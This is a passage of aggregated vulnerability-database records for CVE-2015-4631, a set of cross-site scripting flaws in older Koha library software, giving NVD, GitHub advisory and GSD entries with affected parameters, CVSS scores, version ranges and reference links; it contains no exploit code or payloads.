      {
        "db": "CNNVD",
        "id": "CNNVD-201512-696"
      }
    ],
    "trust": 1.4
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Cross-site scripting",
    "sources": [
      {
        "db": "IVD",
        "id": "70a561b4-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "72631f14-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "747c9c94-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "182e31fa-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "1ad25ddc-1e6e-11e6-abef-000c29c66e3d"
      }
    ],
    "trust": 1.0
  }
}

fkie_cve-2015-4631

Vulnerability from fkie_nvd

Published

2018-10-18 21:29

Modified

2024-11-21 02:31

Severity ?

5.4 (Medium) - CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Summary

References

URL	Tags
cve@mitre.org	https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416	Exploit, Issue Tracking, Vendor Advisory
cve@mitre.org	https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418	Exploit, Issue Tracking, Vendor Advisory
cve@mitre.org	https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423	Exploit, Issue Tracking
cve@mitre.org	https://koha-community.org/koha-3-14-16-released/	Product, Release Notes, Vendor Advisory
cve@mitre.org	https://koha-community.org/security-release-koha-3-16-12/	Product, Release Notes, Vendor Advisory
cve@mitre.org	https://koha-community.org/security-release-koha-3-18-8/	Product, Release Notes, Vendor Advisory
cve@mitre.org	https://koha-community.org/security-release-koha-3-20-1/	Product, Release Notes, Vendor Advisory
cve@mitre.org	https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html	Exploit, Third Party Advisory, VDB Entry
cve@mitre.org	https://seclists.org/fulldisclosure/2015/Jun/80	Exploit, Mailing List, Third Party Advisory
cve@mitre.org	https://www.exploit-db.com/exploits/37389/	Exploit, Third Party Advisory, VDB Entry
cve@mitre.org	https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/	Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416	Exploit, Issue Tracking, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418	Exploit, Issue Tracking, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423	Exploit, Issue Tracking
af854a3a-2127-422b-91ae-364da2661108	https://koha-community.org/koha-3-14-16-released/	Product, Release Notes, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://koha-community.org/security-release-koha-3-16-12/	Product, Release Notes, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://koha-community.org/security-release-koha-3-18-8/	Product, Release Notes, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://koha-community.org/security-release-koha-3-20-1/	Product, Release Notes, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html	Exploit, Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	https://seclists.org/fulldisclosure/2015/Jun/80	Exploit, Mailing List, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://www.exploit-db.com/exploits/37389/	Exploit, Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/	Third Party Advisory

Impacted products

Vendor	Product	Version
koha	koha	*
koha	koha	*
koha	koha	*
koha	koha	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "214E9AA7-580C-4028-AB21-0D723D3037FD",
              "versionEndExcluding": "3.14.16",
              "versionStartIncluding": "3.14.00",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "CEBF9831-C8D6-4503-8192-13D04FB057DB",
              "versionEndExcluding": "3.16.12",
              "versionStartIncluding": "3.16.00",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "A50154EE-37E5-4872-8A1C-57AA8132E91B",
              "versionEndExcluding": "3.18.8",
              "versionStartIncluding": "3.18.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "AE6E0A0A-BA1C-4F6B-92E0-796FFD77AF41",
              "versionEndExcluding": "3.20.1",
              "versionStartIncluding": "3.20.00",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Multiple cross-site scripting (XSS) vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to inject arbitrary web script or HTML via the (1) tag parameter to opac-search.pl; the (2) value parameter to authorities/authorities-home.pl; the (3) delay parameter to acqui/lateorders.pl; the (4) authtypecode or (5) tagfield to admin/auth_subfields_structure.pl; the (6) tagfield parameter to admin/marc_subfields_structure.pl; the (7) limit parameter to catalogue/search.pl; the (8) bookseller_filter, (9) callnumber_filter, (10) EAN_filter, (11) ISSN_filter, (12) publisher_filter, or (13) title_filter parameter to serials/serials-search.pl; or the (14) author, (15) collectiontitle, (16) copyrightdate, (17) isbn, (18) manageddate_from, (19) manageddate_to, (20) publishercode, (21) suggesteddate_from, or (22) suggesteddate_to parameter to suggestion/suggestion.pl; or the (23) direction, (24) display or (25) addshelf parameter to opac-shelves.pl."
    },
    {
      "lang": "es",
      "value": "M\u00faltiples vulnerabilidades Cross-Site Scripting (XSS) en Koha, en versiones 3.14.x anteriores a la 3.14.16, versiones 3.16.x anteriores a la 3.16.12, versiones 3.18.x anteriores a la 3.18.08 y versiones 3.20.x anteriores a la 3.20.1, permiten que atacantes remotos inyecten scripts web o HTML arbitrarios mediante (1) el par\u00e1metro tag en opac-search.pl; (2) el par\u00e1metro value en authorities/authorities-home.pl; (3) el par\u00e1metro delay en acqui/lateorders.pl; (4) los par\u00e1metros authtypecode o (5) tagfield en admin/auth_subfields_structure.pl; (6) el par\u00e1metro tagfield en admin/marc_subfields_structure.pl; (7) el par\u00e1metro limit en catalogue/search.pl; (8) los par\u00e1metros bookseller_filter, (9) callnumber_filter, (10) EAN_filter, (11) ISSN_filter, (12) publisher_filter o (13) title_filter en serials/serials-search.pl; o (14) los par\u00e1metros author, (15) collectiontitle, (16) copyrightdate, (17) isbn, (18) manageddate_from, (19) manageddate_to, (20) publishercode, (21) suggesteddate_from o (22) suggesteddate_to en suggestion/suggestion.pl o los par\u00e1metros (23) direction, (24) display o (25) addshelf en opac-shelves.pl."
    }
  ],
  "id": "CVE-2015-4631",
  "lastModified": "2024-11-21T02:31:26.413",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "LOW",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "NONE",
          "baseScore": 3.5,
          "confidentialityImpact": "NONE",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 6.8,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": true
      }
    ],
    "cvssMetricV30": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 5.4,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "LOW",
          "integrityImpact": "LOW",
          "privilegesRequired": "LOW",
          "scope": "CHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
          "version": "3.0"
        },
        "exploitabilityScore": 2.3,
        "impactScore": 2.7,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2018-10-18T21:29:00.723",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Issue Tracking",
        "Vendor Advisory"
      ],
      "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Issue Tracking",
        "Vendor Advisory"
      ],
      "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Issue Tracking"
      ],
      "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Product",
        "Release Notes",
        "Vendor Advisory"
      ],
      "url": "https://koha-community.org/koha-3-14-16-released/"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Product",
        "Release Notes",
        "Vendor Advisory"
      ],
      "url": "https://koha-community.org/security-release-koha-3-16-12/"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Product",
        "Release Notes",
        "Vendor Advisory"
      ],
      "url": "https://koha-community.org/security-release-koha-3-18-8/"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Product",
        "Release Notes",
        "Vendor Advisory"
      ],
      "url": "https://koha-community.org/security-release-koha-3-20-1/"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "https://seclists.org/fulldisclosure/2015/Jun/80"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://www.exploit-db.com/exploits/37389/"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Issue Tracking",
        "Vendor Advisory"
      ],
      "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Issue Tracking",
        "Vendor Advisory"
      ],
      "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Issue Tracking"
      ],
      "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Product",
        "Release Notes",
        "Vendor Advisory"
      ],
      "url": "https://koha-community.org/koha-3-14-16-released/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Product",
        "Release Notes",
        "Vendor Advisory"
      ],
      "url": "https://koha-community.org/security-release-koha-3-16-12/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Product",
        "Release Notes",
        "Vendor Advisory"
      ],
      "url": "https://koha-community.org/security-release-koha-3-18-8/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Product",
        "Release Notes",
        "Vendor Advisory"
      ],
      "url": "https://koha-community.org/security-release-koha-3-20-1/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "https://seclists.org/fulldisclosure/2015/Jun/80"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://www.exploit-db.com/exploits/37389/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-79"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

ghsa-24mg-jwcv-j892

Vulnerability from github

Published

2022-05-14 01:53

Modified

2022-05-14 01:53

Severity ?

5.4 (Medium) - CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Details

Show details on source website

JSON

To clipboard

{
  "affected": [],
  "aliases": [
    "CVE-2015-4631"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2018-10-18T21:29:00Z",
    "severity": "MODERATE"
  },
  "details": "Multiple cross-site scripting (XSS) vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to inject arbitrary web script or HTML via the (1) tag parameter to opac-search.pl; the (2) value parameter to authorities/authorities-home.pl; the (3) delay parameter to acqui/lateorders.pl; the (4) authtypecode or (5) tagfield to admin/auth_subfields_structure.pl; the (6) tagfield parameter to admin/marc_subfields_structure.pl; the (7) limit parameter to catalogue/search.pl; the (8) bookseller_filter, (9) callnumber_filter, (10) EAN_filter, (11) ISSN_filter, (12) publisher_filter, or (13) title_filter parameter to serials/serials-search.pl; or the (14) author, (15) collectiontitle, (16) copyrightdate, (17) isbn, (18) manageddate_from, (19) manageddate_to, (20) publishercode, (21) suggesteddate_from, or (22) suggesteddate_to parameter to suggestion/suggestion.pl; or the (23) direction, (24) display or (25) addshelf parameter to opac-shelves.pl.",
  "id": "GHSA-24mg-jwcv-j892",
  "modified": "2022-05-14T01:53:12Z",
  "published": "2022-05-14T01:53:12Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-4631"
    },
    {
      "type": "WEB",
      "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416"
    },
    {
      "type": "WEB",
      "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418"
    },
    {
      "type": "WEB",
      "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423"
    },
    {
      "type": "WEB",
      "url": "https://koha-community.org/koha-3-14-16-released"
    },
    {
      "type": "WEB",
      "url": "https://koha-community.org/security-release-koha-3-16-12"
    },
    {
      "type": "WEB",
      "url": "https://koha-community.org/security-release-koha-3-18-8"
    },
    {
      "type": "WEB",
      "url": "https://koha-community.org/security-release-koha-3-20-1"
    },
    {
      "type": "WEB",
      "url": "https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html"
    },
    {
      "type": "WEB",
      "url": "https://seclists.org/fulldisclosure/2015/Jun/80"
    },
    {
      "type": "WEB",
      "url": "https://www.exploit-db.com/exploits/37389"
    },
    {
      "type": "WEB",
      "url": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

gsd-2015-4631

Vulnerability from gsd

Modified

2023-12-13 01:19

Details

Aliases

CVE-2015-4631

Aliases

CVE-2015-4631

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2015-4631",
    "description": "Multiple cross-site scripting (XSS) vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to inject arbitrary web script or HTML via the (1) tag parameter to opac-search.pl; the (2) value parameter to authorities/authorities-home.pl; the (3) delay parameter to acqui/lateorders.pl; the (4) authtypecode or (5) tagfield to admin/auth_subfields_structure.pl; the (6) tagfield parameter to admin/marc_subfields_structure.pl; the (7) limit parameter to catalogue/search.pl; the (8) bookseller_filter, (9) callnumber_filter, (10) EAN_filter, (11) ISSN_filter, (12) publisher_filter, or (13) title_filter parameter to serials/serials-search.pl; or the (14) author, (15) collectiontitle, (16) copyrightdate, (17) isbn, (18) manageddate_from, (19) manageddate_to, (20) publishercode, (21) suggesteddate_from, or (22) suggesteddate_to parameter to suggestion/suggestion.pl; or the (23) direction, (24) display or (25) addshelf parameter to opac-shelves.pl.",
    "id": "GSD-2015-4631",
    "references": [
      "https://packetstormsecurity.com/files/cve/CVE-2015-4631"
    ]
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2015-4631"
      ],
      "details": "Multiple cross-site scripting (XSS) vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to inject arbitrary web script or HTML via the (1) tag parameter to opac-search.pl; the (2) value parameter to authorities/authorities-home.pl; the (3) delay parameter to acqui/lateorders.pl; the (4) authtypecode or (5) tagfield to admin/auth_subfields_structure.pl; the (6) tagfield parameter to admin/marc_subfields_structure.pl; the (7) limit parameter to catalogue/search.pl; the (8) bookseller_filter, (9) callnumber_filter, (10) EAN_filter, (11) ISSN_filter, (12) publisher_filter, or (13) title_filter parameter to serials/serials-search.pl; or the (14) author, (15) collectiontitle, (16) copyrightdate, (17) isbn, (18) manageddate_from, (19) manageddate_to, (20) publishercode, (21) suggesteddate_from, or (22) suggesteddate_to parameter to suggestion/suggestion.pl; or the (23) direction, (24) display or (25) addshelf parameter to opac-shelves.pl.",
      "id": "GSD-2015-4631",
      "modified": "2023-12-13T01:19:59.226074Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "cve@mitre.org",
        "ID": "CVE-2015-4631",
        "STATE": "PUBLIC"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "n/a",
                    "version": {
                      "version_data": [
                        {
                          "version_value": "n/a"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "n/a"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "Multiple cross-site scripting (XSS) vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to inject arbitrary web script or HTML via the (1) tag parameter to opac-search.pl; the (2) value parameter to authorities/authorities-home.pl; the (3) delay parameter to acqui/lateorders.pl; the (4) authtypecode or (5) tagfield to admin/auth_subfields_structure.pl; the (6) tagfield parameter to admin/marc_subfields_structure.pl; the (7) limit parameter to catalogue/search.pl; the (8) bookseller_filter, (9) callnumber_filter, (10) EAN_filter, (11) ISSN_filter, (12) publisher_filter, or (13) title_filter parameter to serials/serials-search.pl; or the (14) author, (15) collectiontitle, (16) copyrightdate, (17) isbn, (18) manageddate_from, (19) manageddate_to, (20) publishercode, (21) suggesteddate_from, or (22) suggesteddate_to parameter to suggestion/suggestion.pl; or the (23) direction, (24) display or (25) addshelf parameter to opac-shelves.pl."
          }
        ]
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "lang": "eng",
                "value": "n/a"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html",
            "refsource": "MISC",
            "url": "https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html"
          },
          {
            "name": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418",
            "refsource": "CONFIRM",
            "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418"
          },
          {
            "name": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/",
            "refsource": "MISC",
            "url": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/"
          },
          {
            "name": "37389",
            "refsource": "EXPLOIT-DB",
            "url": "https://www.exploit-db.com/exploits/37389/"
          },
          {
            "name": "https://koha-community.org/security-release-koha-3-16-12/",
            "refsource": "CONFIRM",
            "url": "https://koha-community.org/security-release-koha-3-16-12/"
          },
          {
            "name": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423",
            "refsource": "CONFIRM",
            "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423"
          },
          {
            "name": "20150625 SBA Research Vulnerability Disclosure - Multiple Critical Vulnerabilities in Koha ILS",
            "refsource": "FULLDISC",
            "url": "https://seclists.org/fulldisclosure/2015/Jun/80"
          },
          {
            "name": "https://koha-community.org/security-release-koha-3-18-8/",
            "refsource": "CONFIRM",
            "url": "https://koha-community.org/security-release-koha-3-18-8/"
          },
          {
            "name": "https://koha-community.org/security-release-koha-3-20-1/",
            "refsource": "CONFIRM",
            "url": "https://koha-community.org/security-release-koha-3-20-1/"
          },
          {
            "name": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416",
            "refsource": "CONFIRM",
            "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416"
          },
          {
            "name": "https://koha-community.org/koha-3-14-16-released/",
            "refsource": "CONFIRM",
            "url": "https://koha-community.org/koha-3-14-16-released/"
          }
        ]
      }
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "3.20.1",
                "versionStartIncluding": "3.20.00",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "3.18.8",
                "versionStartIncluding": "3.18.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "3.16.12",
                "versionStartIncluding": "3.16.00",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "3.14.16",
                "versionStartIncluding": "3.14.00",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2015-4631"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "Multiple cross-site scripting (XSS) vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to inject arbitrary web script or HTML via the (1) tag parameter to opac-search.pl; the (2) value parameter to authorities/authorities-home.pl; the (3) delay parameter to acqui/lateorders.pl; the (4) authtypecode or (5) tagfield to admin/auth_subfields_structure.pl; the (6) tagfield parameter to admin/marc_subfields_structure.pl; the (7) limit parameter to catalogue/search.pl; the (8) bookseller_filter, (9) callnumber_filter, (10) EAN_filter, (11) ISSN_filter, (12) publisher_filter, or (13) title_filter parameter to serials/serials-search.pl; or the (14) author, (15) collectiontitle, (16) copyrightdate, (17) isbn, (18) manageddate_from, (19) manageddate_to, (20) publishercode, (21) suggesteddate_from, or (22) suggesteddate_to parameter to suggestion/suggestion.pl; or the (23) direction, (24) display or (25) addshelf parameter to opac-shelves.pl."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "CWE-79"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/",
              "refsource": "MISC",
              "tags": [
                "Third Party Advisory"
              ],
              "url": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/"
            },
            {
              "name": "37389",
              "refsource": "EXPLOIT-DB",
              "tags": [
                "Exploit",
                "Third Party Advisory",
                "VDB Entry"
              ],
              "url": "https://www.exploit-db.com/exploits/37389/"
            },
            {
              "name": "20150625 SBA Research Vulnerability Disclosure - Multiple Critical Vulnerabilities in Koha ILS",
              "refsource": "FULLDISC",
              "tags": [
                "Exploit",
                "Mailing List",
                "Third Party Advisory"
              ],
              "url": "https://seclists.org/fulldisclosure/2015/Jun/80"
            },
            {
              "name": "https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html",
              "refsource": "MISC",
              "tags": [
                "Exploit",
                "Third Party Advisory",
                "VDB Entry"
              ],
              "url": "https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html"
            },
            {
              "name": "https://koha-community.org/security-release-koha-3-20-1/",
              "refsource": "CONFIRM",
              "tags": [
                "Product",
                "Release Notes",
                "Vendor Advisory"
              ],
              "url": "https://koha-community.org/security-release-koha-3-20-1/"
            },
            {
              "name": "https://koha-community.org/security-release-koha-3-18-8/",
              "refsource": "CONFIRM",
              "tags": [
                "Product",
                "Release Notes",
                "Vendor Advisory"
              ],
              "url": "https://koha-community.org/security-release-koha-3-18-8/"
            },
            {
              "name": "https://koha-community.org/security-release-koha-3-16-12/",
              "refsource": "CONFIRM",
              "tags": [
                "Product",
                "Release Notes",
                "Vendor Advisory"
              ],
              "url": "https://koha-community.org/security-release-koha-3-16-12/"
            },
            {
              "name": "https://koha-community.org/koha-3-14-16-released/",
              "refsource": "CONFIRM",
              "tags": [
                "Product",
                "Release Notes",
                "Vendor Advisory"
              ],
              "url": "https://koha-community.org/koha-3-14-16-released/"
            },
            {
              "name": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423",
              "refsource": "CONFIRM",
              "tags": [
                "Exploit",
                "Issue Tracking"
              ],
              "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423"
            },
            {
              "name": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418",
              "refsource": "CONFIRM",
              "tags": [
                "Exploit",
                "Issue Tracking",
                "Vendor Advisory"
              ],
              "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418"
            },
            {
              "name": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416",
              "refsource": "CONFIRM",
              "tags": [
                "Exploit",
                "Issue Tracking",
                "Vendor Advisory"
              ],
              "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV2": {
          "acInsufInfo": false,
          "cvssV2": {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "availabilityImpact": "NONE",
            "baseScore": 3.5,
            "confidentialityImpact": "NONE",
            "integrityImpact": "PARTIAL",
            "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
            "version": "2.0"
          },
          "exploitabilityScore": 6.8,
          "impactScore": 2.9,
          "obtainAllPrivilege": false,
          "obtainOtherPrivilege": false,
          "obtainUserPrivilege": false,
          "severity": "LOW",
          "userInteractionRequired": true
        },
        "baseMetricV3": {
          "cvssV3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "userInteraction": "REQUIRED",
